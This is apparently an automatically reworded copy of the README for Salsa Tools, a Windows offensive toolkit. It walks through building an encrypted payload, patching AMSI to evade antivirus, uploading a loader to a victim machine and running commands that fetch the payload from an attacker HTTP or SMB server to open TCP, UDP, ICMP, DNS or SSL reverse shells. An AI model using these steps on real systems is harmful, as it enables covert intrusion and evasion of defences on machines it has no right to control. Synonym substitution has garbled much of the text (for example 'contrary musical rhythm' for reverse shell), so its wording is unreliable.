Salsa Tools - Shellreverse Tcp/Udp/Icmp/Dns/Ssl/Bindtcp In Addition To Av Bypass, Amsi Patched

Salsa Tools is a collection of 3 dissimilar tools that combined, allows yous to larn a contrary musical rhythm on steroids inwards whatever Windows environs without fifty-fifty needing PowerShell for it's execution. In fellowship to avoid the latest detection techniques (AMSI), close of the components were initially written on C#. Salsa Tools was publicly released past times Luis Vacas during his Talk “Inmersión en la explotación tiene rima” which took identify during h-c0n inwards ninth Feb 2019.

Features
* TCP/UDP/ICMP/DNS/BIND/SSL      * AV Safe (17th February) * AMSI patchers * PowerShell execution  * ...

Overview
Salsa-Tools is made from 3 dissimilar ingredients: - EvilSalsa - EncrypterAssembly - SalseoLoader And his conduct is equally it follows:

Setup

Requirements
  • Visual Studio 2017 (or similar)
  • Python 2.7

Running la Salsa

Cooking EvilSalsa
   ___ __ __  ____  _               /  _]  |  ||    || |             /  [_|  |  | |  | | |            |    _]  |  | |  | | |___         |   [_|  :  | |  | |     |        |     |\   /  |  | |     |        |_____| \_/  |____||_____|                                            _____  ____  _     _____  ____   / ___/ /    || |   / ___/ /    | (   \_ |  o  || |  (   \_ |  o  |  \__  ||     || |___\__  ||     |  /  \ ||  _  ||     /  \ ||  _  |  \    ||  |  ||     \    ||  |  |   \___||__|__||_____|\___||__|__|    [+] That is our Payload                                  
EvilSalsa is the fundamental ingredient of this recipe. It contains the payload, which is executed on the arrangement equally it follows: equally presently equally the payloads starts, it runs System.Management.Automation.dll which creates a runspace . Within that runspace nosotros direct keep 4 types of shells (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, offset matter first, the beingness of c:\windows\system32\amsi.dll is checked. If it exists, it is patched using a home-cooked variant of CyberArk together with Rastamouse bypasses.

Mixing EncrypterAssembly together with Evilsalsa
  ______                             _              |  ____|                           | |             | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __   |  __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|  | |____| | | | (__| |  | |_| | |_) | ||  __/ |     |______|_| |_|\___|_|   \__, | .__/ \__\___|_|         /\                   __/ | || |   | |             /  \   ___ ___  ___ _|___/|_|| |__ | |_   _       / /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |     / ____ \\__ \__ \  __/ | | | | | |_) | | |_| |    /_/    \_\___/___/\___|_| |_| |_|_.__/|_|\__, |                                              __/ |                                             |___/           [+] Software that encrypts the payload using RC4  [+] We direct keep the version inwards python together with the version inwards .exe
EncrypterAssembly tin survive used equally a Python script or equally a Exe binary. It encrypts the previously generated EvilSalsa.
Python usage:
python encrypterassembly.py   
Executable usage:
Encrypterassembly.exe   

Bringing the Encrypted EvilSalsa to the tabular array amongst SalseoLoader
SalseoLoader is inwards accuse of loading the encrypted payload. Can survive both compiled equally a library or equally an executable. If it is run equally an executable, the chosen arguments must survive provided when the executable is run. If it is compiled equally a library, the descriptor "main" must survive exported. Arguments are added using environmental variables.
  _____  ____  _     _____   ___   ___  / ___/ /    || |   / ___/  /  _] /   \ (   \_ |  o  || |  (   \_  /  [_ |     |  \__  ||     || |___\__  ||    _]|  O  |  /  \ ||  _  ||     /  \ ||   [_ |     |  \    ||  |  ||     \    ||     ||     |   \___||__|__||_____|\___||_____| \___/   _       ___    ____  ___      ___  ____ | |     /   \  /    ||   \    /  _]|    \ | |    |     ||  o  ||    \  /  [_ |  D  ) | |___ |  O  ||     ||  D  ||    _]|    / |     ||     ||  _  ||     ||   [_ |    \ |     ||     ||  |  ||     ||     ||  .  \ |_____| \___/ |__|__||_____||_____||__|\_|                               By: CyberVaca@HackPlayers  [+] Usage:      [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT     [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT     [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt R   everseICMP LHOST     [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS     [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT     [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT     [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode  [+] Shells availables:      [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL [-] Shellcode     [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP

Tutorial

Compiling the binaries
Download the source code from the github together with compile EvilSalsa together with SalseoLoader. You volition ask Visual Studio installed to compile the code.
Compile those projects for the architecture of the windows box where your are going to utilization them(If the Windows supports x64 compile them for that architectures).
You tin select the architecture within Visual Studio inwards the left "Build" Tab inwards "Platform Target".
(If yous can't expose this options press inwards "Project Tab" together with and therefore inwards " Properties")


Then, create both projects (Build -> Build Solution) (Inside the logs volition seem the path of the executable):


Prepare the Backdoor
First of all, yous volition ask to encode the EvilSalsa.dll. To create so, yous tin utilization the python script encrypterassembly.py or yous tin compile the projection EncrypterAssembly

Python
python EncrypterAssembly/encrypterassembly.py    python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows
EncrypterAssembly.exe    EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt
Ok, forthwith yous direct keep everything yous ask to execute all the Salseo thing: the encoded EvilDalsa.dll together with the binary of SalseoLoader. Upload the SalseoLoader.exe binary to the machine. It shouldn't survive detected past times whatever AV...

Execute the backdoor

Getting a TCP contrary musical rhythm (downloading encoded dll through HTTP)
Remember to start a nc equally the contrary musical rhythm listener, together with a HTTP server to serve the encoded evilsalsa.
SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp

Getting a UDP contrary musical rhythm (downloading encoded dll through SMB)
Remember to start a nc equally the contrary musical rhythm listener, together with a SMB server to serve the encoded evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp

Getting a TCP contrary musical rhythm SSL (using local file)
Set the listener within the aggressor machine:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -key key.pem -cert cert.pem -port  -tls1
Execute the backdoor:
SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL  

Getting a ICMP contrary musical rhythm (encoded dll already within the victim)
This fourth dimension yous ask a particular tool inwards the customer to have the contrary shell. Download: [https://github.com/inquisb/icmpsh]
Disable ICMP Replies:
  #You finish, yous tin enable it in 1 lawsuit to a greater extent than running:  sysctl -w net.ipv4.icmp_echo_ignore_all=0  
Execute the client:
python icmpsh_m.py "" ""
Inside the victim, lets execute the salseo thing:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp

Compiling SalseoLoader equally DLL exporting top dog function
Open the SalseoLoader projection using Visual Studio.

Add earlier the top dog function: [DllExport]
Before the top dog component add together this line: [DllExport]


Install DllExport for this project
Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...


Search for DllExport packet (using Browse tab), together with press Install (and convey the popup)


In your projection folder direct keep appeared the files: DllExport.bat together with DllExport_Configure.bat

Uninstall DllExport
Press Uninstall (yeah, its weird but trust me, it is necessary)


Exit Visual Studio together with execute DllExport_configure
Just exit Visual Studio
Then, larn to your SalseoLoader folder together with execute DllExport_Configure.bat Select x64 (if yous are going to utilization it within a x64 box, that was my case), pick out System.Runtime.InteropServices (inside Namespace for DllExport) together with press Apply


Open the projection in 1 lawsuit to a greater extent than amongst visual Studio
[DllExport] should non survive longer marked equally error


Build the solution
Select Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)


Select x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64)


To build the solution: Build --> Build Solution (Inside the Output console the path of the novel DLL volition appear)

Test the generated Dll
Copy together with glue the Dll where yous desire to examination it.
Execute:
rundll32.exe SalseoLoader.dll,main
If non mistake appears, in all likelihood yous direct keep a functional dll!!

Get a musical rhythm using the Dll
Don't forget to utilization a HTTP server together with laid a nc listener

Powershell
 #You finish, yous tin enable it in 1 lawsuit to a greater extent than running: sysctl -w net.ipv4.icmp_echo_ignore_all=0

CMD
$env:pass="password" $env:payload="http://10.2.0.5/evilsalsax64.dll.txt" $env:lhost="10.2.0.5" $env:lport="1337" $env:shell="reversetcp" rundll32.exe SalseoLoader.dll,main
Documented past times https://github.com/carlospolop-forks/